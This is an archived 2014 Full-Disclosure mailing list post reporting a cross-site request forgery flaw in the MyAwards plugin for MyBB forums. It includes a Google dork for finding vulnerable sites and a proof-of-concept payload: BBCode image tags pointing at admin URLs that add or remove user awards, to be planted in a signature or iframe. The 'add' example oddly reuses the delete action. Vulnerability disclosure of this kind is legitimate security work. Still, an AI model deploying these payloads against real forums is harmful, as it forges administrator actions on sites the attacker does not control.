lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFqzMLUXaKQXqtjj4v_ysrFksJERkR=GJuyw5hTUohuNkksgJA@mail.gmail.com> Date: Fri, 22 Aug 2014 18:52:01 +1000 From: surivaton surivaton <surivaton@...il.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] MyBB 1.6 - MyAwards CSRF # Google Dork: allinurl:myawards.php # Date: 08/17/2014 # Exploit Author: Vagineer https://vagineering.me # Version: ALL VERSIONS # Tested on: MyBB 1.6.15 PoC(set this as your signature or iframe it) Add awards [img] https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2 [/img] Remove awards [img] https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1 [/img] _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/